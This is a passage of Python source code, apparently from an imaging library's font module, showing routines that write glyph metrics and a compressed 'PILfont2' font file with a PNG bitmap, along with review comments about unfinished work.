        fp.write("DATA\n")
        for id in range(256):
            m = self.metrics[id]
            if not m:
                # missing glyph: ten zero words keep the fixed record layout
                # (matches the 2+4+4 values written for present glyphs)
                puti16(fp, [0] * 10)
            else:
                puti16(fp, m[0] + m[1] + m[2])
        fp.close()

    def save2(self, filename):
        "Save font in version 2 format"

        # THIS IS WORK IN PROGRESS
        # NOTE(review): self.name is never assigned in this class; a caller or
        # subclass must set it before save2() can run.

        self.compile()

        data = marshal.dumps((self.metrics, self.info))

        if zlib:
            data = "z" + zlib.compress(data, 9)
        else:
            data = "u" + data

        fp = open(os.path.splitext(filename)[0] + ".pil", "wb")
        fp.write("PILfont2\n" + self.name + "\n" + "DATA\n")
        fp.write(data)
        self.bitmap.save(fp, "PNG")
        fp.close()

    save = save1 # for now